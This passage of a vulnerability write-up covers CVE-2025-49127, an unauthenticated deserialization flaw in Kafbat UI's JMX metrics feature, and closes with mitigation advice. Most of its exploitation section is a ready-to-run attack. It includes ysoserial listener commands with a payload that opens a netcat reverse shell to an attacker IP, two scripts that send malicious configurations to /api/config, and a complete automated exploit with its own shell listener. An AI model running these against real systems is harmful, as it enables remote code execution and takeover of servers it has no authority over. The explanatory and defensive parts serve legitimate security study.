MBeanServerConnection msc = jmxConnector.getMBeanServerConnection(); // Get MBean server connection
var jmxMetrics = msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null); // Query MBeans
/*
* CANONICAL_NAME_PATTERN = "kafka.server*:*"
* This queries for all MBeans matching Kafka server pattern
*
* VULNERABILITY 4: Additional deserialization risk
* - queryNames() can trigger additional deserialization
* - ObjectName creation can be exploited
* - Response processing involves more deserialization
*/
for (ObjectName jmxMetric : jmxMetrics) {
sink.addAll(extractObjectMetrics(jmxMetric, msc)); // Extract individual metrics
}
}
JmxMetricsRetriever.java – extractObjectMetrics method:
@SneakyThrows
private List<RawMetric> extractObjectMetrics(ObjectName objectName, MBeanServerConnection msc) {
MBeanAttributeInfo[] attrNames = msc.getMBeanInfo(objectName).getAttributes(); // Get attribute info
Object[] attrValues = new Object[attrNames.length];
for (int i = 0; i < attrNames.length; i++) {
attrValues[i] = msc.getAttribute(objectName, attrNames[i].getName()); // Get attribute values
/*
* VULNERABILITY 5: Multiple deserialization points
* - getMBeanInfo() involves deserialization
* - getAttribute() involves deserialization
* - Each call can be exploited by malicious server
*/
}
return JmxMetricsFormatter.constructMetricsList(objectName, attrNames, attrValues);
}
The attack relies on Java deserialization gadget chains, which are sequences of classes already present on the target classpath that can be chained together to achieve arbitrary code execution when deserialized. A common gadget such as CommonsCollections7 starts with a serialized Hashtable: deserializing it calls Hashtable.readObject(), which leads to Hashtable.reconstitutionPut(), then through an equals() comparison between map keys to LazyMap.get(), followed by ChainedTransformer.transform(), and finally to InvokerTransformer.transform(), which can execute arbitrary code through Runtime.exec(). This entire chain executes automatically during the deserialization process without any additional user interaction.
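The property every gadget chain depends on is that class-defined readObject logic runs as a side effect of deserialization. The harmless sketch below demonstrates only that property with a counter; ReadObjectHookDemo and Probe are hypothetical names, and no gadget classes are involved.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.util.concurrent.atomic.AtomicInteger;

// Hypothetical demo: a private readObject method runs during deserialization.
final class ReadObjectHookDemo {

    static final class Probe implements Serializable {
        private static final long serialVersionUID = 1L;
        static final AtomicInteger HOOK_CALLS = new AtomicInteger();

        // Invoked by ObjectInputStream while the object is being reconstructed.
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            HOOK_CALLS.incrementAndGet();
        }
    }

    /** Serializes and deserializes one Probe and reports how often the hook ran. */
    static int roundTripAndCountHookCalls() {
        int before = Probe.HOOK_CALLS.get();
        try {
            ByteArrayOutputStream bytes = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
                out.writeObject(new Probe());
            }
            try (ObjectInputStream in =
                     new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()))) {
                in.readObject(); // the caller never invokes Probe.readObject directly
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
        return Probe.HOOK_CALLS.get() - before;
    }

    public static void main(String[] args) {
        System.out.println("hook calls during one round trip: " + roundTripAndCountHookCalls());
    }
}
```

In a real chain the hook belongs to a library class such as Hashtable, and the attacker chooses the object graph so that the hook ends up calling into further classes.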
The SSL socket factory implementation in JmxSslSocketFactory adds another layer of complexity and potential exploitation. The static initialization block uses reflection to modify JVM internals through Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField("defaultSocketFactory") followed by defaultSocketFactoryField.set(null, new JmxSslSocketFactory()), which replaces the default SSL socket factory with a custom implementation. This custom factory allows for per-connection SSL configuration through thread-local variables, but it also means that connections to attacker-controlled hosts will use this custom factory, potentially providing additional attack vectors through SSL certificate validation bypasses or SSL context manipulation.
JmxSslSocketFactory.java – static initialization and createSocket method:
static {
boolean sslJmxSupported = false;
try {
// VULNERABILITY 6: Reflection-based modification of JVM internals
Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField("defaultSocketFactory");
defaultSocketFactoryField.setAccessible(true);
defaultSocketFactoryField.set(null, new JmxSslSocketFactory()); // Replaces default factory
sslJmxSupported = true;
} catch (Exception e) {
log.error("SSL can't be enabled for JMX retrieval. "
+ "Make sure your java app run with '--add-opens java.rmi/javax.rmi.ssl=ALL-UNNAMED' arg. Err: {}",
e.getMessage());
log.trace("SSL can't be enabled for JMX retrieval", e);
}
SSL_JMX_SUPPORTED = sslJmxSupported;
}
@Override
public Socket createSocket(String host, int port) throws IOException {
var hostAndPort = new HostAndPort(host, port);
// Check cache first
if (CACHED_FACTORIES.containsKey(hostAndPort)) {
return CACHED_FACTORIES.get(hostAndPort).createSocket(host, port); // Use cached factory
} else if (threadLocalContextSet()) {
var factory = createFactoryFromThreadLocalCtx(); // Create new factory
CACHED_FACTORIES.put(hostAndPort, factory); // Cache it
return factory.createSocket(host, port); // VULNERABLE: Connect to attacker host
}
return defaultSocketFactory.createSocket(host, port); // Fallback to default
}
The configuration structure defined in ClustersProperties allows for these malicious configurations to be easily constructed and submitted. The MetricsConfigData class accepts a type field that can be set to “JMX” to trigger the vulnerable code path, a port field that accepts any integer value for the attacker-controlled port, and optional username and password fields that can be left null to avoid authentication requirements. The default configuration behavior is particularly dangerous, as shown in the setMetricsDefaults method which automatically sets the metrics type to JMX when not specified: cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE).
ClustersProperties.java – MetricsConfigData class and setMetricsDefaults method:
@Data
@ToString(exclude = "password")
public static class MetricsConfigData {
    String type;      // ISSUE: "JMX" triggers vulnerable code
    Integer port;     // ISSUE: Attacker-controlled port
    Boolean ssl;
    String username;  // Can be null (no authentication)
    String password;  // Can be null (no authentication)
    String keystoreLocation;
    String keystorePassword;
}

private void setMetricsDefaults() {
    for (Cluster cluster : clusters) {
        if (cluster.getMetrics() != null && !StringUtils.hasText(cluster.getMetrics().getType())) {
            cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE); // DANGEROUS DEFAULT
        }
    }
}
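The defaulting rule in setMetricsDefaults can be modeled in a few lines of Python to make its effect concrete. This is only a sketch of the condition shown above, operating on plain dictionaries rather than the real Cluster objects; the function name apply_metrics_defaults and the constant value "JMX" are assumptions made for illustration.

```python
from typing import Any

# Assumed to correspond to MetricsConfig.JMX_METRICS_TYPE in the Java code.
JMX_METRICS_TYPE = "JMX"


def apply_metrics_defaults(clusters: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Model of setMetricsDefaults: fill in JMX when a metrics block has no type."""
    for cluster in clusters:
        metrics = cluster.get("metrics")
        # Same condition as the Java snippet: metrics present, type missing or blank.
        if metrics is not None and not str(metrics.get("type") or "").strip():
            metrics["type"] = JMX_METRICS_TYPE
    return clusters


clusters = apply_metrics_defaults([
    {"name": "no-metrics"},                            # untouched: no metrics block
    {"name": "port-only", "metrics": {"port": 1718}},  # type gets defaulted to JMX
    {"name": "prometheus", "metrics": {"type": "PROMETHEUS", "port": 9090}},
])
for cluster in clusters:
    print(cluster["name"], cluster.get("metrics", {}).get("type"))
```

The second entry shows why the default matters: a metrics block that carries only a port is enough to end up on the JMX code path.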
The exploitation timeline reveals how quickly this attack can be executed:
- T+0: An attacker submits a malicious configuration through the /api/config endpoint.
- T+5: The configuration has been validated and potentially persisted to disk.
- T+30: The scheduled metrics collection process automatically triggers, initiating a JMX connection to the attacker-controlled server.
- T+32: The RMI handshake begins.
- T+33: The malicious JMX server sends crafted serialized objects back to the client.
- T+34: Client-side deserialization occurs, triggering the gadget chain.
- T+35: Arbitrary code execution is achieved.
This entire process occurs automatically, without any additional user interaction once the malicious configuration is submitted. That makes the vulnerability particularly dangerous: the scheduled execution mechanism can turn it into a persistent compromise.
Exploitation
The exploitation process involves setting up malicious JMX servers using ysoserial and triggering the vulnerable code path through configuration API calls.
Step 1: Set Up Malicious JMX Server for Initial Attack
First, we’ll set up a JMX server that enables unsafe deserialization:
# Terminal 1: Set up JMX server to enable unsafe deserialization
java -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1718 ScalaProperties "org.apache.commons.collections.enableUnsafeSerialization:true"
This creates a malicious JMX server on port 1718 that will:
- Accept incoming JMX connections
- Return a ScalaProperties payload that enables unsafe deserialization
- Set the system property to allow Commons Collections deserialization
Step 2: Trigger Initial Exploit
Now send the malicious configuration to enable unsafe deserialization:
#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Initial Setup Phase
Enables unsafe deserialization by setting system properties
"""
import requests
import json
# Configuration for the initial exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100" # Replace with your host IP
JMX_PORT_INITIAL = 1718
def send_malicious_config(jmx_port, cluster_name="poc-initial"):
"""Send malicious cluster configuration to trigger JMX connection"""
config_payload = {
"config": {
"properties": {
"auth": {
"type": "DISABLED"
},
"rbac": {
"roles": []
},
"webclient": {},
"kafka": {
"clusters": [
{
"name": "local",
"bootstrapServers": "kafka0:29092",
"schemaRegistry": "http://schema-registry0:8085",
"ksqldbServer": "http://ksqldb0:8088",
"kafkaConnect": [
{
"name": "first",
"address": "http://kafka-connect0:8083"
}
],
"metrics": {
"type": "JMX",
"port": 9997
},
"properties": {},
"readOnly": False,
"audit": {
"topicAuditEnabled": True,
"consoleAuditEnabled": True,
"auditTopicProperties": {}
}
},
{
"name": cluster_name,
"bootstrapServers": f"kafka-malicious-broker:9093",
"metrics": {
"type": "JMX",
"port": jmx_port # Attacker-controlled port
},
"properties": {},
"readOnly": False
}
]
}
}
}
}
headers = {
"Content-Type": "application/json",
"Accept": "*/*",
"User-Agent": "CVE-2025-49127-Exploit/1.0"
}
try:
response = requests.put(
f"{KAFBAT_UI_URL}/api/config",
headers=headers,
json=config_payload,
timeout=30
)
print(f"[+] Request sent to {KAFBAT_UI_URL}/api/config")
print(f"[+] Status Code: {response.status_code}")
print(f"[+] Response Length: {len(response.text)}")
if response.status_code == 200:
print("[+] Configuration accepted - JMX connection should be triggered")
else:
print(f"[-] Unexpected status code: {response.status_code}")
print(f"[-] Response: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Error sending request: {e}")
if __name__ == "__main__":
print("[*] CVE-2025-49127 Exploitation - Phase 1: Enable Unsafe Deserialization")
print(f"[*] Target: {KAFBAT_UI_URL}")
print(f"[*] Attacker Host: {ATTACKER_HOST}")
print(f"[*] JMX Port: {JMX_PORT_INITIAL}")
print("[*] Make sure ysoserial JMX server is running on port 1718")
print()
send_malicious_config(JMX_PORT_INITIAL)
Step 3: Set Up Reverse Shell JMX Server
In two new terminals, start a netcat listener for the reverse shell and the second malicious JMX server that delivers the actual payload:
# Terminal 2: Set up reverse shell listener
nc -lvv 9094
# Terminal 3: Set up JMX server with reverse shell payload
java -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 "nc 192.168.1.100 9094 -e sh"
Step 4: Execute Main Exploit
Now execute the main exploit to get a reverse shell:
#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Main Exploitation Phase
Executes reverse shell payload via unsafe deserialization
"""
import requests
import json
import time
# Configuration for the main exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100" # Replace with your host IP
JMX_PORT_EXPLOIT = 1719
REVERSE_SHELL_PORT = 9094
def exploit_rce():
"""Execute the main RCE exploit"""
config_payload = {
"config": {
"properties": {
"auth": {
"type": "DISABLED"
},
"rbac": {
"roles": []
},
"webclient": {},
"kafka": {
"clusters": [
{
"name": "local",
"bootstrapServers": "kafka0:29092",
"schemaRegistry": "http://schema-registry0:8085",
"ksqldbServer": "http://ksqldb0:8088",
"kafkaConnect": [
{
"name": "first",
"address": "http://kafka-connect0:8083"
}
],
"metrics": {
"type": "JMX",
"port": 9997
},
"properties": {},
"readOnly": False,
"audit": {
"topicAuditEnabled": True,
"consoleAuditEnabled": True,
"auditTopicProperties": {}
}
},
{
"name": "poc-rce",
"bootstrapServers": f"kafka-malicious-broker:9093",
"metrics": {
"type": "JMX",
"port": JMX_PORT_EXPLOIT # Port with RCE payload
},
"properties": {},
"readOnly": False
}
]
}
}
}
}
headers = {
"Content-Type": "application/json",
"Accept": "*/*",
"User-Agent": "CVE-2025-49127-Exploit/1.0"
}
try:
print("[*] Sending RCE payload...")
response = requests.put(
f"{KAFBAT_UI_URL}/api/config",
headers=headers,
json=config_payload,
timeout=30
)
print(f"[+] RCE payload sent")
print(f"[+] Status Code: {response.status_code}")
if response.status_code == 200:
print("[+] Exploit successful! Check your reverse shell listener.")
else:
print(f"[-] Unexpected response: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Error during exploitation: {e}")
def main():
print("[*] CVE-2025-49127 Exploitation - Phase 2: Remote Code Execution")
print(f"[*] Target: {KAFBAT_UI_URL}")
print(f"[*] Attacker Host: {ATTACKER_HOST}")
print(f"[*] JMX Port: {JMX_PORT_EXPLOIT}")
print(f"[*] Reverse Shell Port: {REVERSE_SHELL_PORT}")
print()
print("[!] Make sure you have:")
print(" 1. JMX server running on port 1719 with CommonsCollections7 payload")
print(" 2. Netcat listener running on port 9094")
print(" 3. Phase 1 exploit completed successfully")
print()
input("Press Enter when ready to exploit...")
exploit_rce()
if __name__ == "__main__":
main()
Step 5: Complete Automated Exploit
Here’s a complete automated exploit that combines both phases:
#!/usr/bin/env python3
"""
CVE-2025-49127 Complete Automated Exploit
Exploits unsafe deserialization in Kafbat UI JMX connection handling
"""
import requests
import json
import time
import subprocess
import threading
import socket
import sys
class CVE202549127Exploit:
def __init__(self, target_url, attacker_host, reverse_port=9094):
self.target_url = target_url.rstrip('/')
self.attacker_host = attacker_host
self.reverse_port = reverse_port
self.jmx_setup_port = 1718
self.jmx_exploit_port = 1719
def check_target_accessible(self):
"""Check if target is accessible"""
try:
response = requests.get(f"{self.target_url}/actuator/health", timeout=5)
return response.status_code == 200
except:
return False
def setup_reverse_listener(self):
"""Set up reverse shell listener"""
def listener():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', self.reverse_port))
sock.listen(1)
print(f"[+] Reverse shell listener started on port {self.reverse_port}")
conn, addr = sock.accept()
print(f"[+] Connection received from {addr}")
while True:
data = conn.recv(1024)
if not data:
break
print(data.decode(), end='')
except Exception as e:
print(f"[-] Error in reverse listener: {e}")
thread = threading.Thread(target=listener, daemon=True)
thread.start()
return thread
def setup_jmx_servers(self):
"""Setup malicious JMX servers using ysoserial"""
try:
# Setup JMX server for enabling unsafe deserialization
setup_cmd = [
'java', '-cp', 'ysoserial-0.0.6-all.jar',
'ysoserial.exploit.JRMPListener',
str(self.jmx_setup_port),
'ScalaProperties',
'org.apache.commons.collections.enableUnsafeSerialization:true'
]
print(f"[*] Starting JMX setup server on port {self.jmx_setup_port}")
setup_process = subprocess.Popen(setup_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait a moment for server to start
time.sleep(2)
# Setup JMX server for RCE payload
exploit_cmd = [
'java', '-cp', 'ysoserial-0.0.6-all.jar',
'ysoserial.exploit.JRMPListener',
str(self.jmx_exploit_port),
'CommonsCollections7',
f'nc {self.attacker_host} {self.reverse_port} -e sh'
]
print(f"[*] Starting JMX exploit server on port {self.jmx_exploit_port}")
exploit_process = subprocess.Popen(exploit_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(2)
return setup_process, exploit_process
except Exception as e:
print(f"[-] Error setting up JMX servers: {e}")
return None, None
def send_malicious_config(self, jmx_port, cluster_name):
"""Send malicious cluster configuration"""
config_payload = {
"config": {
"properties": {
"auth": {"type": "DISABLED"},
"rbac": {"roles": []},
"webclient": {},
"kafka": {
"clusters": [
{
"name": "local",
"bootstrapServers": "kafka0:29092",
"metrics": {"type": "JMX", "port": 9997},
"properties": {},
"readOnly": False
},
{
"name": cluster_name,
"bootstrapServers": "kafka-malicious-broker:9093",
"metrics": {
"type": "JMX",
"port": jmx_port
},
"properties": {},
"readOnly": False
}
]
}
}
}
}
headers = {
"Content-Type": "application/json",
"Accept": "*/*",
"User-Agent": "CVE-2025-49127-Exploit/1.0"
}
try:
response = requests.put(
f"{self.target_url}/api/config",
headers=headers,
json=config_payload,
timeout=30
)
return response.status_code == 200
except Exception as e:
print(f"[-] Error sending configuration: {e}")
return False
def exploit(self):
"""Execute the complete exploit"""
print("=" * 60)
print("CVE-2025-49127 Kafbat UI RCE Exploit")
print("=" * 60)
print(f"Target: {self.target_url}")
print(f"Attacker Host: {self.attacker_host}")
print(f"Reverse Shell Port: {self.reverse_port}")
print("=" * 60)
# Check target accessibility
print("[*] Checking target accessibility...")
if not self.check_target_accessible():
print("[-] Target not accessible. Please check the URL and network connectivity.")
return False
print("[+] Target is accessible")
# Setup reverse shell listener
print("[*] Setting up reverse shell listener...")
listener_thread = self.setup_reverse_listener()
time.sleep(1)
# Setup JMX servers
print("[*] Setting up malicious JMX servers...")
setup_proc, exploit_proc = self.setup_jmx_servers()
if not setup_proc or not exploit_proc:
print("[-] Failed to setup JMX servers")
return False
print("[+] JMX servers ready")
# Phase 1: Enable unsafe deserialization
print("[*] Phase 1: Enabling unsafe deserialization...")
if self.send_malicious_config(self.jmx_setup_port, "poc-setup"):
print("[+] Phase 1 successful")
else:
print("[-] Phase 1 failed")
return False
time.sleep(3)
# Phase 2: Execute RCE payload
print("[*] Phase 2: Executing RCE payload...")
if self.send_malicious_config(self.jmx_exploit_port, "poc-rce"):
print("[+] RCE payload sent successfully!")
print("[+] Check your reverse shell listener for incoming connection...")
print("[*] If successful, you should have a shell connection")
else:
print("[-] Failed to send RCE payload")
return False
# Keep processes alive for a while
print("[*] Keeping exploit servers alive for 60 seconds...")
time.sleep(60)
# Cleanup
try:
setup_proc.terminate()
exploit_proc.terminate()
except:
pass
return True
def main():
if len(sys.argv) != 3:
print("Usage: python3 exploit.py <target_url> <attacker_ip>")
print("Example: python3 exploit.py http://localhost:8080 192.168.1.100")
sys.exit(1)
target_url = sys.argv[1]
attacker_host = sys.argv[2]
exploit = CVE202549127Exploit(target_url, attacker_host)
success = exploit.exploit()
if success:
print("\n[+] Exploit completed successfully!")
else:
print("\n[-] Exploit failed!")
if __name__ == "__main__":
main()
Usage Example
# Make sure ysoserial is in the current directory
ls -la ysoserial-0.0.6-all.jar
# Run the complete exploit
python3 exploit.py http://localhost:8080 192.168.1.100
output:
# [+] Target is accessible
# [+] JMX servers ready
# [+] Phase 1 successful
# [+] RCE payload sent successfully!
# [+] Check your reverse shell listener for incoming connection...
Mitigation
To protect against CVE-2025-49127 and similar vulnerabilities, implement the following security measures:
Upgrade to Fixed Version:
# Update to Kafbat UI version 1.1.0 or later
docker pull ghcr.io/kafbat/kafka-ui:v1.1.0
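To confirm that a deployment is actually running the fixed release, the image tag can be compared against 1.1.0. The following is a minimal sketch; the helper names parse_version and needs_upgrade are hypothetical, and it assumes tags follow the vMAJOR.MINOR.PATCH pattern used in the pull command above.

```python
FIXED_VERSION = (1, 1, 0)  # fixed release named in this advisory


def parse_version(tag: str) -> tuple[int, ...]:
    """Turn 'v1.0.0' or '1.0.0' into (1, 0, 0); any '-suffix' is ignored."""
    core = tag.lstrip("vV").split("-", 1)[0]
    parts = tuple(int(part) for part in core.split("."))
    # Pad short tags such as '1.1' so they compare as (1, 1, 0).
    return parts + (0,) * (3 - len(parts))


def needs_upgrade(tag: str) -> bool:
    """True when the tag is older than the fixed release."""
    return parse_version(tag) < FIXED_VERSION


for tag in ("v1.0.0", "v1.1.0", "1.2.0"):
    print(tag, "needs upgrade" if needs_upgrade(tag) else "ok")
```

Tags that are not numeric (for example a floating tag such as latest) raise ValueError here, which is deliberate: such tags cannot be verified this way and should be checked by hand.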
Disable Dynamic Configuration:
# In docker-compose.yml or application configuration
environment:
DYNAMIC_CONFIG_ENABLED: 'false'
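Where dynamic configuration has to stay enabled for a while, submitted configurations can at least be reviewed for JMX clusters that point at unknown hosts. The sketch below assumes the payload layout used by the /api/config requests in this article (config, properties, kafka, clusters); the function name find_untrusted_jmx_clusters and the trusted-host allowlist are hypothetical, and where such a check would run (a reverse proxy, an audit script) is left open.

```python
from typing import Any


def find_untrusted_jmx_clusters(payload: dict[str, Any], trusted_hosts: set[str]) -> list[str]:
    """Return names of clusters that use JMX metrics with a non-allowlisted broker host."""
    clusters = (
        payload.get("config", {}).get("properties", {}).get("kafka", {}).get("clusters", [])
    )
    flagged = []
    for cluster in clusters:
        metrics = cluster.get("metrics")
        if metrics is None:
            continue
        # A missing type is treated as JMX, matching the setMetricsDefaults behavior.
        if str(metrics.get("type") or "JMX").upper() != "JMX":
            continue
        servers = cluster.get("bootstrapServers", "")
        # Strip the port from each host:port entry (IPv6 literals are not handled).
        hosts = {s.strip().rsplit(":", 1)[0] for s in servers.split(",") if s.strip()}
        if not hosts <= trusted_hosts:
            flagged.append(cluster.get("name", "<unnamed>"))
    return flagged


payload = {"config": {"properties": {"kafka": {"clusters": [
    {"name": "local", "bootstrapServers": "kafka0:29092",
     "metrics": {"type": "JMX", "port": 9997}},
    {"name": "poc-initial", "bootstrapServers": "kafka-malicious-broker:9093",
     "metrics": {"type": "JMX", "port": 1718}},
]}}}}
print(find_untrusted_jmx_clusters(payload, trusted_hosts={"kafka0"}))
```

An allowlist is used rather than a blocklist because the attacker chooses the host name freely; this check is a stopgap and does not replace upgrading or disabling dynamic configuration.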
Conclusion
CVE-2025-49127 represents a critical security vulnerability in Kafbat UI 1.0.0 that demonstrates the dangers of unsafe deserialization in Java applications. The vulnerability stems from the application’s dynamic configuration feature, which allows unauthenticated users to specify arbitrary JMX endpoints without proper validation. When the application attempts to connect to these attacker-controlled JMX services, it becomes susceptible to Java deserialization attacks that can lead to complete system compromise.
The vulnerability highlights several critical security principles that were violated in the original implementation: lack of input validation, absence of authentication requirements for sensitive operations, unsafe handling of external connections, and insufficient sandboxing of deserialization processes. The attack vector is particularly dangerous because it requires no authentication and can be exploited remotely through a simple HTTP request to the configuration API.
Organizations using Kafbat UI should immediately upgrade to version 1.1.0 or later, implement proper authentication and authorization controls, and establish network segmentation to limit the blast radius of potential attacks. Additionally, implementing comprehensive monitoring and detection capabilities will help identify and respond to exploitation attempts. This vulnerability serves as a reminder of the importance of secure-by-default design principles and the need for thorough security testing of dynamic configuration features in enterprise applications.